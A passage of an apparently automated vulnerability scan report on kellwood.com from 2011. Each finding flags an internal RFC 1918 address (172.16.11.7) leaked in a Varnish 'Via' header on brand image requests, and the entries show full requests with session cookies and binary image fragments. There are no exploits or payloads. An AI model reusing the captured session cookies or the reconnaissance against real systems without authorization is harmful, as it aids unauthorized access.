Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "2c38a8c3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:57 GMT
X-Powered-By: ASP.NET
Content-Length: 2314
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435631
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...+...7.......C.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......................................CDD................................................................................
...[SNIP]...
14.39. http://kellwood.com/brand_images/logo_jolt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_jolt.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_jolt.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "7ce5f781a291cb1:0"
Last-Modified: Wed, 01 Dec 2010 21:55:46 GMT
X-Powered-By: ASP.NET
Content-Length: 2492
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009435259
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...L.........:.......tEXtSoftware.Adobe ImageReadyq.e<..    ^IDATx.b...?.....002... !.{..m.....'..........m......?...<...v....L=PK#..Q...#.....@E.A~^..~. @...`.@. ..An.KK..AL..o........3
...[SNIP]...
14.40. http://kellwood.com/brand_images/logo_koret.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_koret.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_koret.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "64b128d3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:58 GMT
X-Powered-By: ASP.NET
Content-Length: 2376
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436196
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...c.........%..2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...UlTk...e.....%.;$Xp..Jx..\.....[.`    .,...Op'X......)....|{O........Nr...|:....|g.bbb.....z....J.J..l..Q.W..O.<....KXX..
...[SNIP]...
14.41. http://kellwood.com/brand_images/logo_mymichelle.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_mymichelle.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_mymichelle.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "fc5668d3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:59 GMT
X-Powered-By: ASP.NET
Content-Length: 1767
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435417
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...i..........>.%....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..XilTU.~.u.
.P.*..-J. .E.E6Q    .1jp..$..`L.R.D.H#...1....    .F#R...*M%.J.) B......B..;o.G.\.<:.X..M....{..g...g..c.*.....D.?
...[SNIP]...
14.42. http://kellwood.com/brand_images/logo_phatfarm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_phatfarm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_phatfarm.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "aa6f998d3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:59 GMT
X-Powered-By: ASP.NET
Content-Length: 3648
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436232
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...,...).....NI......tEXtSoftware.Adobe ImageReadyq.e<...IDATx..Y    xT..>w.l.d#....Av..U.....*Td7Zj.P..Z...'V..W
.P....""....%.P d.,0...Nf......gB..__.3wy....s.z.r..A.(Ed......G....RP
...[SNIP]...
14.43. http://kellwood.com/brand_images/logo_rebeccataylor.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_rebeccataylor.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_rebeccataylor.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "4a5feb21afaecb1:0"
Last-Modified: Fri, 07 Jan 2011 21:09:12 GMT
X-Powered-By: ASP.NET
Content-Length: 1151
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009434853
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............jndl....tEXtSoftware.Adobe ImageReadyq.e<...!IDATx..Y.u.0.6}.......    ..M'(L@:A.    .....L.L@:A.....=.*....z..&.e.$Kbr.^.d2..R....U.W-e...4.!...H.6.t,.v".Bf......A.V......^.
...[SNIP]...
14.44. http://kellwood.com/brand_images/logo_rewind.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_rewind.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_rewind.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "a06dc88d3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:59 GMT
X-Powered-By: ASP.NET
Content-Length: 3524
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435634
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...q............_....tEXtSoftware.Adobe ImageReadyq.e<..fIDATx...    .V...g... "..^@...<PP..P$e0J..E.@.    F.....QL..........."*F.
.U*.E.%B.C]9.e...'_.......C.bj.n.o........g.5..Z?.....]/.
...[SNIP]...
14.45. http://kellwood.com/brand_images/logo_sagharbor.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_sagharbor.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_sagharbor.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "ce2008e3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:00 GMT
X-Powered-By: ASP.NET
Content-Length: 2289
Date: Mon, 11 Apr 2011 17:19:58 GMT
X-Varnish: 2009435926
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR..............2......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...y..U...w...*#.2.I.F...*e.
Q...(.:..Z.PG...6JQ.T
.i..$&K!.(.H..:.;3o.u>.sn.......y...w..{.....g{...i.*.2.H...A}A.`cB.N
...[SNIP]...
14.46. http://kellwood.com/brand_images/logo_sangria.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_sangria.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_sangria.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "e0ef328e3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:00 GMT
X-Powered-By: ASP.NET
Content-Length: 2501
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435640
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...(...=.......+E....tEXtSoftware.Adobe ImageReadyq.e<..    gIDATx...yp.W..o"W.... bK..Ml!...j).......5.UT.Q......j,-5.Y*..RZk*E......K..=....o|...\..uf..]....<.....%.n=.M.j._A2...T..
f..
...[SNIP]...
14.47. http://kellwood.com/brand_images/logo_vince.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_vince.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_vince.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "ec84648e3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:00 GMT
X-Powered-By: ASP.NET
Content-Length: 913
Date: Mon, 11 Apr 2011 17:19:55 GMT
X-Varnish: 2009434770
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...^.........T.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..X.m.0.......D.....&.:A.    .L.g...D. .A.....:A{.N...?...@.2.'....\}...._....:.....#..i.A.....u.WY0.1F...=....c3j...~j..]
...[SNIP]...
14.48. http://kellwood.com/brand_images/logo_xoxo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_xoxo.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_xoxo.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "26a6958e3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:01 GMT
X-Powered-By: ASP.NET
Content-Length: 680
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009435198
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...C..........D......tEXtSoftware.Adobe ImageReadyq.e<...JIDATx..X.Q.0.u....l@6 #x..A..l.:AG..d..    R&H. .=.N..R..;.G-.O.~...S..tZy6<.+....).+?.Y..>W.`..3.?'0....."..}.......t+/.;....*b
...[SNIP]...
14.49. http://kellwood.com/brand_images/mymichelle.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/mymichelle.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/mymichelle.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "60f4c8f3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:01 GMT
X-Powered-By: ASP.NET
Content-Length: 91532
Date: Mon, 11 Apr 2011 17:19:53 GMT
X-Varnish: 2009434071
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   .............................................................................................U....
...[SNIP]...
14.50. http://kellwood.com/brand_images/phatfarm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/phatfarm.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/phatfarm.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "785cc3d83b54cb1:0"
Last-Modified: Tue, 14 Sep 2010 18:37:12 GMT
X-Powered-By: ASP.NET
Content-Length: 58031
Date: Mon, 11 Apr 2011 17:19:55 GMT
X-Varnish: 2009434688
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
..9P..SL.........................................
.                .

.....
...........................

..................................
...[SNIP]...
14.51. http://kellwood.com/brand_images/rebeccataylor.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/rebeccataylor.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/rebeccataylor.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "6a20d425afaecb1:0"
Last-Modified: Fri, 07 Jan 2011 21:09:18 GMT
X-Powered-By: ASP.NET
Content-Length: 64167
Date: Mon, 11 Apr 2011 17:19:52 GMT
X-Varnish: 2009433481
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
..70..J..........................................
.                .

.....
...........................

..................................
...[SNIP]...
14.52. http://kellwood.com/brand_images/rewind.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/rewind.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/rewind.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "162fc68f3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:03 GMT
X-Powered-By: ASP.NET
Content-Length: 86259
Date: Mon, 11 Apr 2011 17:19:54 GMT
X-Varnish: 2009434122
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   .............................................................................................U....
...[SNIP]...
14.53. http://kellwood.com/brand_images/sagharbor.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/sagharbor.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/sagharbor.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "26cd2b903328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:03 GMT
X-Powered-By: ASP.NET
Content-Length: 83862
Date: Mon, 11 Apr 2011 17:19:55 GMT
X-Varnish: 2009434647
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......U......Adobe.d...........................................................


.....................
...
.......................................................U....
...[SNIP]...
14.54. http://kellwood.com/brand_images/sangria.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/sangria.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/sangria.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "be8f76903328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:47:04 GMT
X-Powered-By: ASP.NET
Content-Length: 58690
Date: Mon, 11 Apr 2011 17:19:54 GMT
X-Varnish: 2009434141
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......Z.....&Adobe.d...........
..4...\7.......@.................................................................................................................
...[SNIP]...
14.55. http://kellwood.com/brand_images/vince.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/vince.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/vince.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "c2ecffb8cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:24 GMT
X-Powered-By: ASP.NET
Content-Length: 46248
Date: Mon, 11 Apr 2011 17:19:52 GMT
X-Varnish: 2009433478
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

